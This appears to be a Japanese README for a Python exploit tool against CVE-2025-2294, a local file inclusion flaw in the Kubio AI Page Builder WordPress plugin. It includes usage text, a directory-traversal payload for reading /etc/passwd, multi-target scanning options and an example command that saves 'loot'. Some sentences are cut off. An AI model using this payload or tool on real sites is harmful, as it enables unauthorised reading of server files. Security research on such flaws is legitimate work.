
Pythonエクスプロイトスクリプト for CVE-2025-2294、WordPress Kubio AI Page Builder ≤ 2.5.1における認証不要のローカルファイルインクルージョン脆弱性。単一/複数ターゲットスキャン、カスタムペイロード、プロキシ、レスポンスプレビューに対応。
CVE-2025-2294 は、WordPress 用の Kubio AI Page Builder プラグイン (バージョン 2.5.1 まで) に影響を与えます。このプラグインは、thekubio_hybrid_theme_load_template 関数を介して 認証されていないローカルファイルインクルージョン (LFI) の脆弱性を持っています。
この脆弱性により、攻撃者は脆弱な WordPress サーバー上で任意のファイルをインクルードおよび実行できるようになり、次のような結果を引き起こす可能性があります:
この Python スクリプトは、細工された HTTP GET リクエストを脆弱な WordPress サイトに送信し、そのサイトが LFI 問題に対して脆弱かどうかを確認します。
/etc/passwd)。usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
[--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
[--check] [--list LIST]
CVE-2025-2294 LFI Exploit
optional arguments:
-h, --help show this help message and exit
--url URL Target URL (e.g., http://127.0.0.1:8080)
--payload PAYLOAD
LFI payload path (default: ../../../../../../../../etc/passwd)
--save SAVE Save full response to file (optional)
--lines LINES Number of preview lines (default: 10)
--timeout TIMEOUT
Request timeout in seconds (default: 10)
--proxy PROXY Proxy URL (e.g., http://127.0.0.1:8080)
--check Check vulnerability status only, no saving or preview
--list LIST Path to file with list of URLs to check one by one
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"
リクエスト/レスポンス:
このツールは、許可されたセキュリティテストおよび研究目的のみを対象としています。許可なくシステムに対して不正に使用することは、違法であり非倫理的です。